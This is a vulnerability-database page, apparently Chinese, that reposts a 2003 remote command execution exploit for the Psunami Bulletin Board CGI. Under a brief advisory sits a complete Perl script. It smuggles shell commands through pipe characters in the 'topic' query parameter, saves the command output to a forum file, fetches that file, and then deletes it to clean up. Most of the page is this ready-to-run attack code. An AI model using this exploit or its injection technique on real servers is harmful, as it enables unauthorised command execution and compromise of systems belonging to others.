Psunami Bulletin Board 0.x – ‘Psunami.cgi’ Remote Command Execution (1)
漏洞ID | 1053688 | 漏洞类型 | |
发布时间 | 2003-01-13 | 更新时间 | 2003-01-13 |
CVE编号 | N/A |
CNNVD-ID | N/A |
漏洞平台 | CGI | CVSS评分 | N/A |
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/6607/info
Psunami Bulletin Board is prone to a remote command execution vulnerability.
Psunami does not sufficiently sanitize shell metacharacters from query string parameters. As a result, it may be possible for a remote attacker to execute arbitrary commands in the context of the webserver process.
#!/usr/bin/perl
use IO::Socket;
#
#
#Psunami Bulletin Board CGI remote command execution
#tested on version 0.5.2
#
#
#
#PsunamiBB doesn't look for escape characters in the GET variables
#When u view a thread u can escape your command:
#
#http://127.0.0.1/cgi-bin/psunami.cgi?action=board&board=1&topic=1004527509
#U can execute your command by:
#http://127.0.0.1/cgi-bin/psunami.cgi?action=board&board=1&topic=|ls -al /|
#
#The command will be executed, however it will not be shown...
#This is perlscript makes use of the forum and displays your command
#
#
# usage: ./cgi.psunami.pl <hostname> <path> [urlenc cmd]
# example: /cgi.psunami.pl 127.0.0.1 /cgi-bin/board/psunami/ ls%20-al | tr -s \\v \\n
# //note: tr is used to convert the n's to v's and back, so it fits in the bbfiles
#
# u might have to adjust the wait times depending on connection and server
# when there is no results, u should try again, it's often a matter of multiple tries
# the server must also run tr, this is essential for this exploit to see the cmd output
#
#
#PsunamiBB:
#http://psunami.sf.net/
#
#author:
#dodo [[email protected]]
#
if(!$ARGV[0] || !$ARGV[1])
{
print "PsunamiBB remote execution CGI exploitnby dodo [[email protected]]nn";
print "usage: ./cgi.psunami.pl <hostname> <path> [urlenc cmd]n";
print "example: ./cgi.psunami.pl 127.0.0.1 /cgi-bin/board/psunami/ ls%20-al | tr -s \\v \\n nn";
print "if it doesnt seemwork, try adjusting the sleep times or try multiple timesnyour command output should
be somewhere in the html outputn";
exit();
}
$path = $ARGV[1];
$host = $ARGV[0];
if (!$ARGV[2]) {
$cmd = "uname%20-a";
} else {
$cmd = $ARGV[2];
}
$port = 80;
$sleep = 2; #overal sleep
$sleep_view = 6;
$sleep_view2 = 4;
$append = "psunami.cgi?action=topic&board=1&topic=|echo%200::dodo::0::0::%3Epsunami/board1/dodo|";
$append1 = "psunami.cgi?action=topic&board=1&topic=|$cmd|tr%20-s%20\\n%20\\v%3E%3Epsunami/board1/dodo|";
$append2 =
"psunami.cgi?action=topic&board=1&topic=|cat%20psunami/board1/dodo|tr%20-d%20\\n%20%3Epsunami/board1/dodo|";
$append3 = "psunami.cgi?action=topic&board=1&topic=dodo";
$append4 = "psunami.cgi?action=topic&board=1&topic=|rm%20psunami/board1/dodo|";
$i = 0;
while ($i<5)
{
$socket = new IO::Socket::INET (
Proto => "tcp",
PeerAddr => $host,
PeerPort => $port,
);
die "unable to connect to $host:$port ($!)n" unless $socket;
if ($i eq 0) {
print $socket "GET $path$appendnHTTP/1.0n";
print "sending 1n";
sleep $sleep;
}
if ($i eq 1) {
print $socket "GET $path$append1nHTTP/1.0n";
print "sending 2n";
}
if ($i eq 2) {
print $socket "GET $path$append2nHTTP/1.0n";
print "sending 3n";
}
if ($i eq 3) {
print "receiving datan";
sleep $sleep_view;
print $socket "GET $path$append3nHTTP/1.0n";
while (defined($line = <$socket>)) {
$recv .= $line;
}
sleep $sleep_view2;
}
if ($i eq 4) {
print "cleaning up...";
sleep $sleep;
print $socket "GET $path$append4nHTTP/1.0n";
print "donen";
}
close($socket);
$i++;
}
print $recv;
print "the above is received from the server, if you have a 404 or 403, theres somethin wrong
if not, and no command output, try again..
if command ouput buggy, convert \v to \n with trn";
相关推荐: MS Site Server Unauthorized SQL Command Injection Vulnerability
MS Site Server Unauthorized SQL Command Injection Vulnerability 漏洞ID 1102527 漏洞类型 Input Validation Error 发布时间 2002-01-31 更新时间 2002…
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
恐龙抗狼扛1年前0
kankan啊啊啊啊3年前0
66666666666666